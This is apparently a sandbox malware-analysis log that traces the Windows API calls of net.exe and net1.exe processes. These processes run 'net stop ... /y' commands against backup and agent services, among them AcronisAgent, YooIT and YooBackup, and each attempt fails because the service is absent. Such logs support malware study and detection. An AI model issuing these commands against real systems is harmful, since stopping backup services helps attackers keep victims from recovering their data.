[0106.719] _wcsicmp (_String1="pause", _String2="stc_raw_agent") returned -3 [0106.719] _wcsicmp (_String1="session", _String2="stc_raw_agent") returned -15 [0106.719] _wcsicmp (_String1="sessions", _String2="stc_raw_agent") returned -15 [0106.719] _wcsicmp (_String1="sess", _String2="stc_raw_agent") returned -15 [0106.719] _wcsicmp (_String1="share", _String2="stc_raw_agent") returned -12 [0106.719] _wcsicmp (_String1="start", _String2="stc_raw_agent") returned -2 [0106.719] _wcsicmp (_String1="stats", _String2="stc_raw_agent") returned -2 [0106.719] _wcsicmp (_String1="statistics", _String2="stc_raw_agent") returned -2 [0106.719] _wcsicmp (_String1="stop", _String2="stc_raw_agent") returned 12 [0106.720] _wcsicmp (_String1="time", _String2="stc_raw_agent") returned 1 [0106.720] _wcsicmp (_String1="user", _String2="stc_raw_agent") returned 2 [0106.720] _wcsicmp (_String1="users", _String2="stc_raw_agent") returned 2 [0106.720] _wcsicmp (_String1="msg", _String2="stc_raw_agent") returned -6 [0106.720] _wcsicmp (_String1="messenger", _String2="stc_raw_agent") returned -6 [0106.720] _wcsicmp (_String1="receiver", _String2="stc_raw_agent") returned -1 [0106.720] _wcsicmp (_String1="rcv", _String2="stc_raw_agent") returned -1 [0106.720] _wcsicmp (_String1="netpopup", _String2="stc_raw_agent") returned -5 [0106.720] _wcsicmp (_String1="redirector", _String2="stc_raw_agent") returned -1 [0106.720] _wcsicmp (_String1="redir", _String2="stc_raw_agent") returned -1 [0106.720] _wcsicmp (_String1="rdr", _String2="stc_raw_agent") returned -1 [0106.720] _wcsicmp (_String1="workstation", _String2="stc_raw_agent") returned 4 [0106.720] _wcsicmp (_String1="work", _String2="stc_raw_agent") returned 4 [0106.720] _wcsicmp (_String1="wksta", _String2="stc_raw_agent") returned 4 [0106.720] _wcsicmp (_String1="prdr", _String2="stc_raw_agent") returned -3 [0106.720] _wcsicmp (_String1="devrdr", _String2="stc_raw_agent") returned -15 [0106.720] _wcsicmp (_String1="lanmanworkstation", _String2="stc_raw_agent") returned -7 [0106.720] _wcsicmp (_String1="server", _String2="stc_raw_agent") returned -15 [0106.720] _wcsicmp (_String1="svr", _String2="stc_raw_agent") returned 2 [0106.720] _wcsicmp (_String1="srv", _String2="stc_raw_agent") returned -2 [0106.720] _wcsicmp (_String1="lanmanserver", _String2="stc_raw_agent") returned -7 [0106.720] _wcsicmp (_String1="alerter", _String2="stc_raw_agent") returned -18 [0106.720] _wcsicmp (_String1="netlogon", _String2="stc_raw_agent") returned -5 [0106.721] _wcsupr (in: _String="stc_raw_agent" | out: _String="STC_RAW_AGENT") returned="STC_RAW_AGENT" [0106.721] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7454b0 [0107.074] GetServiceKeyNameW (in: hSCManager=0x7454b0, lpDisplayName="STC_RAW_AGENT", lpServiceName=0x3faaf0, lpcchBuffer=0x2ff8f0 | out: lpServiceName="", lpcchBuffer=0x2ff8f0) returned 0 [0107.074] _wcsicmp (_String1="msg", _String2="STC_RAW_AGENT") returned -6 [0107.074] _wcsicmp (_String1="messenger", _String2="STC_RAW_AGENT") returned -6 [0107.074] _wcsicmp (_String1="receiver", _String2="STC_RAW_AGENT") returned -1 [0107.075] _wcsicmp (_String1="rcv", _String2="STC_RAW_AGENT") returned -1 [0107.075] _wcsicmp (_String1="redirector", _String2="STC_RAW_AGENT") returned -1 [0107.075] _wcsicmp (_String1="redir", _String2="STC_RAW_AGENT") returned -1 [0107.075] _wcsicmp (_String1="rdr", _String2="STC_RAW_AGENT") returned -1 [0107.075] _wcsicmp (_String1="workstation", _String2="STC_RAW_AGENT") returned 4 [0107.075] _wcsicmp (_String1="work", _String2="STC_RAW_AGENT") returned 4 [0107.075] _wcsicmp (_String1="wksta", _String2="STC_RAW_AGENT") returned 4 [0107.075] _wcsicmp (_String1="prdr", _String2="STC_RAW_AGENT") returned -3 [0107.165] _wcsicmp (_String1="devrdr", _String2="STC_RAW_AGENT") returned -15 [0107.165] _wcsicmp (_String1="lanmanworkstation", _String2="STC_RAW_AGENT") returned -7 [0107.165] _wcsicmp (_String1="server", _String2="STC_RAW_AGENT") returned -15 [0107.165] _wcsicmp (_String1="svr", _String2="STC_RAW_AGENT") returned 2 [0107.165] _wcsicmp (_String1="srv", _String2="STC_RAW_AGENT") returned -2 [0107.165] _wcsicmp (_String1="lanmanserver", _String2="STC_RAW_AGENT") returned -7 [0107.165] _wcsicmp (_String1="alerter", _String2="STC_RAW_AGENT") returned -18 [0107.165] _wcsicmp (_String1="netlogon", _String2="STC_RAW_AGENT") returned -5 [0107.165] NetServiceControl (in: servername=0x0, service="STC_RAW_AGENT", opcode=0x0, arg=0x0, bufptr=0x2ff8ec | out: bufptr=0x2ff8ec) returned 0x889 [0107.166] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0107.166] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0107.167] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0107.168] GetFileType (hFile=0x0) returned 0x0 [0107.168] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x743ed0 [0107.168] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x743ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0107.168] WriteFile (in: hFile=0x0, lpBuffer=0x743ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2ff82c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff82c, lpOverlapped=0x0) returned 0 [0107.168] LocalFree (hMem=0x743ed0) returned 0x0 [0107.168] GetFileType (hFile=0x0) returned 0x0 [0107.168] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x746178 [0107.168] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x746178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nt", lpUsedDefaultChar=0x0) returned 2 [0107.168] WriteFile (in: hFile=0x0, lpBuffer=0x746178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ff82c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff82c, lpOverlapped=0x0) returned 0 [0107.168] LocalFree (hMem=0x746178) returned 0x0 [0107.168] _ultow (in: _Dest=0x889, _Radix=3143772 | out: _Dest=0x889) returned="2185" [0107.168] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0107.168] GetFileType (hFile=0x0) returned 0x0 [0107.168] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x746178 [0107.168] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x746178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0107.168] WriteFile (in: hFile=0x0, lpBuffer=0x746178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2ff838, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff838, lpOverlapped=0x0) returned 0 [0107.168] LocalFree (hMem=0x746178) returned 0x0 [0107.168] GetFileType (hFile=0x0) returned 0x0 [0107.168] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x746178 [0107.168] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x746178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nt", lpUsedDefaultChar=0x0) returned 2 [0107.169] WriteFile (in: hFile=0x0, lpBuffer=0x746178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ff838, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff838, lpOverlapped=0x0) returned 0 [0107.169] LocalFree (hMem=0x746178) returned 0x0 [0107.169] NetApiBufferFree (Buffer=0x741ae8) returned 0x0 [0107.169] NetApiBufferFree (Buffer=0x741b00) returned 0x0 [0107.169] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop stc_raw_agent /y" [0107.170] exit (_Code=2) Process: id = "130" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x24834000" os_pid = "0xea0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop AcronisAgent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 504 os_tid = 0xe8c Process: id = "131" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x24e9a000" os_pid = "0x884" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x834" cmd_line = "C:\\Windows\\system32\\net1 stop YooIT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 505 os_tid = 0xa80 [0107.501] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfe2c | out: lpSystemTimeAsFileTime=0xcfe2c*(dwLowDateTime=0x14fd1610, dwHighDateTime=0x1d6f0d1)) [0107.501] GetCurrentProcessId () returned 0x884 [0107.501] GetCurrentThreadId () returned 0xa80 [0107.501] GetTickCount () returned 0x114eb49 [0107.501] QueryPerformanceCounter (in: lpPerformanceCount=0xcfe24 | out: lpPerformanceCount=0xcfe24*=22660219645) returned 1 [0107.502] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0107.502] __set_app_type (_Type=0x1) [0107.502] __p__fmode () returned 0x770331f4 [0107.502] __p__commode () returned 0x770331fc [0107.502] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0107.502] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0107.502] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.502] GetConsoleOutputCP () returned 0x1b5 [0107.503] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0107.503] SetThreadUILanguage (LangId=0x0) returned 0x409 [0107.506] sprintf_s (in: _DstBuf=0xcfde4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0107.506] setlocale (category=0, locale=".437") returned="English_United States.437" [0107.508] GetStdHandle (nStdHandle=0xfffffff5) returned 0x2fc [0107.508] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0107.508] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop YooIT /y" [0107.508] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcfbb0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0107.508] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x5e) returned 0x503ac8 [0107.508] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0107.509] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcfdb4 | out: Buffer=0xcfdb4*=0x501ad0) returned 0x0 [0107.509] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcfdb4 | out: Buffer=0xcfdb4*=0x501ae8) returned 0x0 [0107.509] _fileno (_File=0x77032900) returned -2 [0107.509] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0107.509] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0107.509] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0107.509] _wcsicmp (_String1="config", _String2="stop") returned -16 [0107.509] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0107.509] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0107.509] _wcsicmp (_String1="file", _String2="stop") returned -13 [0107.509] _wcsicmp (_String1="files", _String2="stop") returned -13 [0107.509] _wcsicmp (_String1="group", _String2="stop") returned -12 [0107.509] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0107.509] _wcsicmp (_String1="help", _String2="stop") returned -11 [0107.509] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0107.509] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0107.509] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0107.509] _wcsicmp (_String1="session", _String2="stop") returned -15 [0107.509] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0107.509] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0107.509] _wcsicmp (_String1="share", _String2="stop") returned -12 [0107.509] _wcsicmp (_String1="start", _String2="stop") returned -14 [0107.509] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0107.509] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0107.509] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0107.510] _wcsicmp (_String1="accounts", _String2="YooIT") returned -24 [0107.510] _wcsicmp (_String1="computer", _String2="YooIT") returned -22 [0107.510] _wcsicmp (_String1="config", _String2="YooIT") returned -22 [0107.510] _wcsicmp (_String1="continue", _String2="YooIT") returned -22 [0107.510] _wcsicmp (_String1="cont", _String2="YooIT") returned -22 [0107.510] _wcsicmp (_String1="file", _String2="YooIT") returned -19 [0107.510] _wcsicmp (_String1="files", _String2="YooIT") returned -19 [0107.510] _wcsicmp (_String1="group", _String2="YooIT") returned -18 [0107.510] _wcsicmp (_String1="groups", _String2="YooIT") returned -18 [0107.510] _wcsicmp (_String1="help", _String2="YooIT") returned -17 [0107.510] _wcsicmp (_String1="helpmsg", _String2="YooIT") returned -17 [0107.510] _wcsicmp (_String1="localgroup", _String2="YooIT") returned -13 [0107.510] _wcsicmp (_String1="pause", _String2="YooIT") returned -9 [0107.510] _wcsicmp (_String1="session", _String2="YooIT") returned -6 [0107.510] _wcsicmp (_String1="sessions", _String2="YooIT") returned -6 [0107.510] _wcsicmp (_String1="sess", _String2="YooIT") returned -6 [0107.510] _wcsicmp (_String1="share", _String2="YooIT") returned -6 [0107.510] _wcsicmp (_String1="start", _String2="YooIT") returned -6 [0107.510] _wcsicmp (_String1="stats", _String2="YooIT") returned -6 [0107.510] _wcsicmp (_String1="statistics", _String2="YooIT") returned -6 [0107.510] _wcsicmp (_String1="stop", _String2="YooIT") returned -6 [0107.510] _wcsicmp (_String1="time", _String2="YooIT") returned -5 [0107.510] _wcsicmp (_String1="user", _String2="YooIT") returned -4 [0107.510] _wcsicmp (_String1="users", _String2="YooIT") returned -4 [0107.510] _wcsicmp (_String1="msg", _String2="YooIT") returned -12 [0107.510] _wcsicmp (_String1="messenger", _String2="YooIT") returned -12 [0107.510] _wcsicmp (_String1="receiver", _String2="YooIT") returned -7 [0107.511] _wcsicmp (_String1="rcv", _String2="YooIT") returned -7 [0107.511] _wcsicmp (_String1="netpopup", _String2="YooIT") returned -11 [0107.511] _wcsicmp (_String1="redirector", _String2="YooIT") returned -7 [0107.511] _wcsicmp (_String1="redir", _String2="YooIT") returned -7 [0107.511] _wcsicmp (_String1="rdr", _String2="YooIT") returned -7 [0107.511] _wcsicmp (_String1="workstation", _String2="YooIT") returned -2 [0107.511] _wcsicmp (_String1="work", _String2="YooIT") returned -2 [0107.511] _wcsicmp (_String1="wksta", _String2="YooIT") returned -2 [0107.511] _wcsicmp (_String1="prdr", _String2="YooIT") returned -9 [0107.511] _wcsicmp (_String1="devrdr", _String2="YooIT") returned -21 [0107.511] _wcsicmp (_String1="lanmanworkstation", _String2="YooIT") returned -13 [0107.511] _wcsicmp (_String1="server", _String2="YooIT") returned -6 [0107.511] _wcsicmp (_String1="svr", _String2="YooIT") returned -6 [0107.511] _wcsicmp (_String1="srv", _String2="YooIT") returned -6 [0107.511] _wcsicmp (_String1="lanmanserver", _String2="YooIT") returned -13 [0107.511] _wcsicmp (_String1="alerter", _String2="YooIT") returned -24 [0107.511] _wcsicmp (_String1="netlogon", _String2="YooIT") returned -11 [0107.511] _wcsupr (in: _String="YooIT" | out: _String="YOOIT") returned="YOOIT" [0107.597] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x505488 [0107.600] GetServiceKeyNameW (in: hSCManager=0x505488, lpDisplayName="YOOIT", lpServiceName=0x3faaf0, lpcchBuffer=0xcfd50 | out: lpServiceName="", lpcchBuffer=0xcfd50) returned 0 [0107.600] _wcsicmp (_String1="msg", _String2="YOOIT") returned -12 [0107.600] _wcsicmp (_String1="messenger", _String2="YOOIT") returned -12 [0107.600] _wcsicmp (_String1="receiver", _String2="YOOIT") returned -7 [0107.600] _wcsicmp (_String1="rcv", _String2="YOOIT") returned -7 [0107.600] _wcsicmp (_String1="redirector", _String2="YOOIT") returned -7 [0107.600] _wcsicmp (_String1="redir", _String2="YOOIT") returned -7 [0107.601] _wcsicmp (_String1="rdr", _String2="YOOIT") returned -7 [0107.601] _wcsicmp (_String1="workstation", _String2="YOOIT") returned -2 [0107.601] _wcsicmp (_String1="work", _String2="YOOIT") returned -2 [0107.601] _wcsicmp (_String1="wksta", _String2="YOOIT") returned -2 [0107.601] _wcsicmp (_String1="prdr", _String2="YOOIT") returned -9 [0107.601] _wcsicmp (_String1="devrdr", _String2="YOOIT") returned -21 [0107.601] _wcsicmp (_String1="lanmanworkstation", _String2="YOOIT") returned -13 [0107.601] _wcsicmp (_String1="server", _String2="YOOIT") returned -6 [0107.601] _wcsicmp (_String1="svr", _String2="YOOIT") returned -6 [0107.601] _wcsicmp (_String1="srv", _String2="YOOIT") returned -6 [0107.601] _wcsicmp (_String1="lanmanserver", _String2="YOOIT") returned -13 [0107.601] _wcsicmp (_String1="alerter", _String2="YOOIT") returned -24 [0107.601] _wcsicmp (_String1="netlogon", _String2="YOOIT") returned -11 [0107.601] NetServiceControl (in: servername=0x0, service="YOOIT", opcode=0x0, arg=0x0, bufptr=0xcfd4c | out: bufptr=0xcfd4c) returned 0x889 [0107.602] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0107.602] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0107.603] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0107.604] GetFileType (hFile=0x0) returned 0x0 [0107.604] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x503ea8 [0107.604] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x503ea8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0107.604] WriteFile (in: hFile=0x0, lpBuffer=0x503ea8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xcfc8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcfc8c, lpOverlapped=0x0) returned 0 [0107.604] LocalFree (hMem=0x503ea8) returned 0x0 [0107.604] GetFileType (hFile=0x0) returned 0x0 [0107.604] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x506150 [0107.604] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x506150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nP", lpUsedDefaultChar=0x0) returned 2 [0107.604] WriteFile (in: hFile=0x0, lpBuffer=0x506150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xcfc8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcfc8c, lpOverlapped=0x0) returned 0 [0107.604] LocalFree (hMem=0x506150) returned 0x0 [0107.604] _ultow (in: _Dest=0x889, _Radix=851132 | out: _Dest=0x889) returned="2185" [0107.604] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0107.604] GetFileType (hFile=0x0) returned 0x0 [0107.605] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x506150 [0107.605] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x506150, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0107.605] WriteFile (in: hFile=0x0, lpBuffer=0x506150, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xcfc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcfc98, lpOverlapped=0x0) returned 0 [0107.605] LocalFree (hMem=0x506150) returned 0x0 [0107.605] GetFileType (hFile=0x0) returned 0x0 [0107.605] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x506150 [0107.605] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x506150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nP", lpUsedDefaultChar=0x0) returned 2 [0107.605] WriteFile (in: hFile=0x0, lpBuffer=0x506150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xcfc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcfc98, lpOverlapped=0x0) returned 0 [0107.605] LocalFree (hMem=0x506150) returned 0x0 [0107.605] NetApiBufferFree (Buffer=0x501ad0) returned 0x0 [0107.605] NetApiBufferFree (Buffer=0x501ae8) returned 0x0 [0107.605] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop YooIT /y" [0107.606] exit (_Code=2) Process: id = "132" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x25518000" os_pid = "0xc78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x624" cmd_line = "C:\\Windows\\system32\\net1 stop YooBackup /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 506 os_tid = 0xc7c [0107.543] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33ff3c | out: lpSystemTimeAsFileTime=0x33ff3c*(dwLowDateTime=0x15043a30, dwHighDateTime=0x1d6f0d1)) [0107.543] GetCurrentProcessId () returned 0xc78 [0107.543] GetCurrentThreadId () returned 0xc7c [0107.543] GetTickCount () returned 0x114eb78 [0107.543] QueryPerformanceCounter (in: lpPerformanceCount=0x33ff34 | out: lpPerformanceCount=0x33ff34*=22664417478) returned 1 [0107.544] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0107.544] __set_app_type (_Type=0x1) [0107.544] __p__fmode () returned 0x770331f4 [0107.544] __p__commode () returned 0x770331fc [0107.544] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0107.545] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0107.545] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.545] GetConsoleOutputCP () returned 0x1b5 [0107.606] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0107.606] SetThreadUILanguage (LangId=0x0) returned 0x409 [0107.609] sprintf_s (in: _DstBuf=0x33fef4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0107.609] setlocale (category=0, locale=".437") returned="English_United States.437" [0107.611] GetStdHandle (nStdHandle=0xfffffff5) returned 0x2fc [0107.611] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0107.611] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop YooBackup /y" [0107.611] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x33fcc0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0107.611] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x66) returned 0x4b3ad8 [0107.611] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0107.611] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x33fec4 | out: Buffer=0x33fec4*=0x4b1ae0) returned 0x0 [0107.612] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x33fec4 | out: Buffer=0x33fec4*=0x4b1af8) returned 0x0 [0107.612] _fileno (_File=0x77032900) returned -2 [0107.612] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0107.612] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0107.612] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0107.612] _wcsicmp (_String1="config", _String2="stop") returned -16 [0107.612] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0107.612] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0107.612] _wcsicmp (_String1="file", _String2="stop") returned -13 [0107.612] _wcsicmp (_String1="files", _String2="stop") returned -13 [0107.612] _wcsicmp (_String1="group", _String2="stop") returned -12 [0107.612] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0107.612] _wcsicmp (_String1="help", _String2="stop") returned -11 [0107.612] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0107.612] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0107.612] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0107.612] _wcsicmp (_String1="session", _String2="stop") returned -15 [0107.612] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0107.612] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0107.612] _wcsicmp (_String1="share", _String2="stop") returned -12 [0107.612] _wcsicmp (_String1="start", _String2="stop") returned -14 [0107.612] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0107.612] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0107.612] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0107.612] _wcsicmp (_String1="accounts", _String2="YooBackup") returned -24 [0107.612] _wcsicmp (_String1="computer", _String2="YooBackup") returned -22 [0107.612] _wcsicmp (_String1="config", _String2="YooBackup") returned -22 [0107.612] _wcsicmp (_String1="continue", _String2="YooBackup") returned 